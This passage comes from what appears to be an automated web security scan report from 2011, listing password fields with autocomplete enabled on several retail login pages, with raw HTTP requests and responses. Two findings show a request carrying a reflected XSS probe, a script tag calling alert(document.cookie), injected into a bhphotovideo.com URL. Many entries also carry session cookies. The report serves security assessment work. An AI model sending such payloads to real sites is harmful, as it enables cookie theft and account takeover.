Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<div id="billing_page_signin_popup" width="273"> <form action="https://ordering.ftd.com/528/signin/"> <table width=273 border=0 cellpadding=1>
...[SNIP]...
<td width='60%' align=left><input type="password" name="password" value="" size="12" maxlength="18" /></td>
...[SNIP]...

14.14. https://secure.bhphotovideo.com/bnh/controller/home

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:06:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:06:56 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
</div>
   <form class="loginRegister" action="https://secure.bhphotovideo.com/bnh/controller/home?O=LogIn&A=logMeIn&Q=Login.jsp" method="post" name="login">
       
           <input type="hidden" name="originPage" value="cart.jsp"/>
...[SNIP]...
</label> <input name="password" type="password" maxlength="15" size="20"/></li>
...[SNIP]...

14.15. https://secure.bhphotovideo.com/bnh/controller/home

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:06:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:06:56 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=nr1QNRFMzp!1551726241; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171364821305544044440; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:21:31 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
</form>

   <form class="loginRegister" name="Registration" id="Registration" class="basic" action="https://secure.bhphotovideo.com/bnh/controller/home?O=Register&A=registerNewUser&Q=Login.jsp" method="post" onsubmit="return validateRetypeEmail('emailAddress','retypeEmail')">
   
       
                                                                   <input type="hidden" name="prev_O" value='cart.jsp'/>
...[SNIP]...
</label><input name="retypedNewPassword" type="password" value="" maxlength="15" onpaste="return false;" size="20" /></li>
...[SNIP]...

14.16. https://secure.bluenile.com/accounts/account-sign-in.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.bluenile.com
Path:   /accounts/account-sign-in.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sitetrack=jse~1; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; pop=sweeps~1; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; stc=3NZR3Q; testcookie=; __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; JSESSIONID=C17E9A3C5BCE364EF1C941E8BE0AB1C0

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:22:03 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=17D12AC0F69B7A9A14DCACE026AA9639; Path=/; Secure
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 10:22:04 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63175


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your
...[SNIP]...
</p>
<form id="accountLoginForm" action="/accounts/account-sign-in.html" method="POST"><input id="formLogin" name="formLogin" type="hidden" value="false"/>
...[SNIP]...
</label>
<input id="accountLogin.password" name="accountLogin.password" class="account-password-input" type="password" value="" maxlength="30"/> <span class="instructions">
...[SNIP]...

14.17. https://secure.bluenile.com/accounts/account-sign-in.html

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.bluenile.com
Path:   /accounts/account-sign-in.html

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:37 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=C4A385CE7874D0A2B551FC74E3744D04; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your
...[SNIP]...
</p>
<form id="accountLoginForm" action="/accounts/account-sign-in.html;jsessionid=C4A385CE7874D0A2B551FC74E3744D04" method="POST"><input id="formLogin" name="formLogin" type="hidden" value="false"/>
...[SNIP]...
</label>
<input id="accountLogin.password" name="accountLogin.password" class="account-password-input" type="password" value="" maxlength="30"/> <span class="instructions">
...[SNIP]...

14.18. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.orientaltrading.com
Path:   /ui/userProfile/processRequest.do

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /ui/userProfile/processRequest.do?requestURI=displayLogin HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305510848788}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 85683


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


       
...[SNIP]...
<div id="loginAndCheckOut">
           <form action="/ui/userProfile/processRequest.do" method="post">
                <input type="hidden" name="requestURI" value="processProfileLogin">
...[SNIP]...
</label>
    <input type="password" maxlength="25" size="20" name="password" id="password" /><br />
...[SNIP]...

14.19. http://shoprunner.force.com/content/JsContentElementsGNC

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsGNC

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /content/JsContentElementsGNC HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/community/index.jsp%20%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:43 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:18 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=8008
Expires: Mon, 16 May 2011 12:29:56 GMT
Date: Mon, 16 May 2011 10:16:28 GMT
Connection: close
Content-Length: 108383


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

14.20. http://shoprunner.force.com/content/JsContentElementsPET

Summary

Severity:   Low
Confidence:   Certain
Host:   http://shoprunner.force.com
Path:   /content/JsContentElementsPET

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /content/JsContentElementsPET HTTP/1.1
Host: shoprunner.force.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-Modified-Since: Mon, 16 May 2011 01:05:40 GMT

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: Salesforce.com ApexPages
P3P: CP="CUR OTR STA"
Last-Modified: Mon, 16 May 2011 06:29:45 GMT
Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: public, max-age=7868
Expires: Mon, 16 May 2011 12:29:04 GMT
Date: Mon, 16 May 2011 10:17:56 GMT
Connection: close
Content-Length: 106125


function sr_run(){
return false
}

/* -----------------------------------------
* Global Variables
----------------------------------------- */
//the shoprunner object
var sr_$={};
sr_$.contents={}
...[SNIP]...
</div>';

//learn step 1
var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions.validate.form(\'sr_lrn1F\')){sr_$.actions.learnStep(2);}return false;"><h4 class="sr_htag">
...[SNIP]...
</label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li>
...[SNIP]...

14.21. https://www.acehardware.com/checkout/index.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /checkout/index.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510830898}; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<tr>
                       <form name="newCustomer" onsubmit="valSignUp();return false;" action="/coreg/index.jsp" method="post">
                       <input type="hidden" name="step" value="signup">
...[SNIP]...
<br>
                           <input type="password" id="passwrd" size="18" name="newPassword" class="pagetext">
                           <br>
...[SNIP]...
<br>
                           <input type="password" id="confPasswrd" size="18" name="newPassword2" class="pagetext">
                           
   
                                                                                                               <br>
...[SNIP]...

14.22. https://www.acehardware.com/checkout/index.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /checkout/index.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: www.acehardware.com
Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; fsr.session={"v":1,"rid":"1305510186434_570135","pv":2,"to":5,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510830898}; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305511345979%7C1308103345979%3B%20gpv_p27%3DHome%2520Page%7C1305513145986%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//www.acehardware.com/coreg/index.jsp%2525253Fstep%2525253Dregister%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:40 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 95809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<tr>
                   
                       <form name="returningCustomer" onsubmit="valLogin();return false;" action="/coreg/index.jsp" method="post">
                       <INPUT TYPE=hidden NAME="token" VALUE=""/>
...[SNIP]...
<br>
                       <input type="password" id="passwd" size="18" name="password" class="pagetext">
                       <br>
...[SNIP]...

14.23. https://www.armaniexchange.com/account/login.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.armaniexchange.com
Path:   /account/login.do

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /account/login.do?method=view HTTP/1.1
Host: www.armaniexchange.com
Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=iuoJJxDKPc84a1dE2-; mbcc=736A768E-F798-53C9-B056-8FE338824CC8; s_cc=true; mbcs=6451B347-829F-5F10-0394-7AA048201BB1; fsr.s={"v":1,"rid":"1305510204631_768485","to":5,"c":"http://www.armaniexchange.com/category/womens.do","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1305510843196}; gpv_p4l=Womens; s_sq=mlax5prod%3D%2526pid%253DWomens%2526pidt%253D1%2526oid%253Dhttp%25253A//www.armaniexchange.com/account.do%25253Fmethod%25253Dstart%252526nav%25253D%2525252Fcategory%2525252Fid%2525252F100199%2526ot%253DA; customer=none; basket=none

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 02:13:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 02:13:15 GMT
Connection: keep-alive
Set-Cookie: customer=none; path=/; expires=Wed, 29-May-2013 02:13:14 GMT
Set-Cookie: basket=none; path=/; expires=Mon, 30-May-2011 02:13:14 GMT
Content-Length: 48782


<html>
<head>


<title>Designer Clothing at Armani Exchange</title>

...[SNIP]...
</tr>


   <form name="accountRegisterForm" method="post" action="/account/login.do?method=view" id="mainForm">

<tr valign="top">
...[SNIP]...
<div><input type="password" name="loginPassword" maxlength="50" size="15" value="" class="loginmyaccount"></div>
...[SNIP]...

14.24. https://www.armaniexchange.com/account/login.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.armaniexchange.com
Path:   /account/login.do

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /account/login.do?method=view HTTP/1.1
Host: www.armaniexchange.com
Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=iuoJJxDKPc84a1dE2-; mbcc=736A768E-F798-53C9-B056-8FE338824CC8; s_cc=true; mbcs=6451B347-829F-5F10-0394-7AA048201BB1; fsr.s={"v":1,"rid":"1305510204631_768485","to":5,"c":"http://www.armaniexchange.com/category/womens.do","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0,"f":1305510843196}; gpv_p4l=Womens; s_sq=mlax5prod%3D%2526pid%253DWomens%2526pidt%253D1%2526oid%253Dhttp%25253A//www.armaniexchange.com/account.do%25253Fmethod%25253Dstart%252526nav%25253D%2525252Fcategory%2525252Fid%2525252F100199%2526ot%253DA; customer=none; basket=none

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 02:13:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 02:13:15 GMT
Connection: keep-alive
Set-Cookie: customer=none; path=/; expires=Wed, 29-May-2013 02:13:14 GMT
Set-Cookie: basket=none; path=/; expires=Mon, 30-May-2011 02:13:14 GMT
Content-Length: 48782


<html>
<head>


<title>Designer Clothing at Armani Exchange</title>

...[SNIP]...
<td>


   <form name="accountRegisterForm" method="post" action="/account/registerusername.do?method=submit" id="mainForm1">
<table width="310" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...
<td><input type="password" name="loginPassword" maxlength="50" value="" class="loginmyaccount"></td>
...[SNIP]...
<td><input type="password" name="loginPasswordConfirm" maxlength="50" value="" class="loginmyaccount"></td>
...[SNIP]...

14.25. http://www.bluefly.com/myfly/login.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bluefly.com
Path:   /myfly/login.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /myfly/login.jsp;jsessionid=ONzgfawlrUIPLStla7ZseA**.bluefly_node4 HTTP/1.1
Host: www.bluefly.com
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
